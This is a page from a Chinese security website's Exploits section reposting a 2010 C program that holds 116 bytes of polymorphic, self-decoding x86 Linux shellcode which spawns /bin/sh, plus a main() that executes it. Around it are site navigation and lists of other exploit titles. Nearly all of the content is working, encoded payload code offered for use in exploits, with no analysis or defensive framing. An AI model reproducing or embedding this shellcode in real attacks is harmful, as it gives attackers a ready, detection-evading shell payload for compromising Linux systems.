首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Polymorphic /bin/sh x86 linux shellcode
来源:yudha.gunslinger[at]gmail.com 作者:gunslinger_ 发布时间:2010-06-30  

/*
Title  : Polymorphic /bin/sh x86 linux shellcode .
Name   : 116 bytes /bin/sh x86 linux polymorphic shellcode .
Date   : Tue Jun 29 22:08:59 WIT 2010 .
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (exploit-db.com)
*/

#include <stdio.h>

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\xfa\x80\x6c\x0e\xff\x35\x80\xe9\x01"
     "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x20\x46\x93\x66\xfe\xe6"
     "\x79\xb5\xa1\x43\x34\x6a\xb5\x1e\x36\xaa\x2b\x20\x3a\x1d\x1f"
     "\x34\x34\x34\x93\x33\xed\x53\x5f\x43\x58\x43\xde\x8e\x5e\xc5"
     "\xeb\xdd\x7d\x1a\x20\x1e\x04\xed\x55\x66\x4c\x5e\x44\x27\x56"
     "\x6d\x4c\x3a\x46\x21\x3d\xa9\xbd\x5c\x09\x2f\x46\x04\x42\x03"
     "\x40\x5d\x48\xa9\xc1\x32\xc2\x28\x1e\x04\x1a\x03\x40\x5d\x48"
     "\x03\x31\x5c\x1a\x4b\x51\x7d\xbb\xe5\x9e\x04";

int main(void)
{
 fprintf(stdout,"Length: %d\n",strlen(shellcode));
 (*(void(*)()) shellcode)();
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/ARM - setuid(0) & kill(-
·Linux/ARM chmod("/etc/shadow",
·Linux/ARM - setuid(0) & execve
·TheWorld Browser 3.1.6.8 DOS E
·Mozilla Firefox 3.6.6 Denial o
·Acoo Browser 1.98.744 Denial o
·Winamp v5.571 Malicious AVI De
·Opera 10.54 Denial of Service
·MemDb Multiple Remote Dos
·Netscape Browser 9.x Denial of
·GSM SIM Utility sms file Local
·Internet Browser Classic (IBC
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved